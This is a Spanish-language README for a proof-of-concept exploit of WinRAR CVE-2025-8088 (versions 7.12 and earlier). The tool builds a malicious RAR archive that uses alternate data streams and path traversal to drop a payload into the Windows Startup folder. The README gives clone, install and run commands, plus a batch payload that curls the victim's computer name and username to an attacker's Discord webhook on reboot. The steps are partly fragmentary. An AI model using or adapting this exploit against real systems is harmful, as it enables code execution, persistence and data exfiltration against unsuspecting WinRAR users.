
Explotación del CVE de Winrar anterior a 7.13 mediante múltiples flujos ADS en un solo archivo (Implementación de PDF personalizado)
Un exploit de prueba de concepto para la vulnerabilidad de WinRAR (CVE-2025-8088) que afecta a las versiones 7.12 y anteriores. Esta herramienta crea un archivo RAR malicioso que incrusta cargas útiles en flujos de datos alternativos (ADS) con path traversal, lo que potencialmente conduce a la ejecución arbitraria de código.
# Clone the repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088
# Install dependencies
pip install reportlab
# Run the exploit
python CVE-2025-8088.py
Edita la carga útil para llamar a un webhook de Discord:
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
Reemplaza YOUR_DISCORD_WEBHOOK_URL por tu URL de webhook real.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
3. En el siguiente reinicio ➡️ la carga útil se ejecuta automáticamente
## 📋 Requisitos
- Sistema operativo Windows 🪟
- Python 3.x 🐍
- WinRAR instalado
- Biblioteca ReportLab (pip install reportlab)